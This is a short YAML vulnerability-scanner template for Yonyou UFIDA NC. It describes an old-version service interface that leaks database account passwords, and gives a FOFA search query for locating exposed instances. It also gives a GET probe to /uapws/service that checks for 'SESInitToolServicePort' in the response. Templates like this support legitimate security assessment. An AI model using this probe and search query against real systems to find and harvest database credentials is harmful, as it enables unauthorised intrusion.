product: 用友UFIDA-NC
vName: 用友UFIDA NC service接口信息泄漏漏洞
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 用友nc有个接口可以获取数据库账户密码，不过是老版本了
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && title=="产品登录界面"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17685157.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /uapws/service
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - SESInitToolServicePort
            logic: and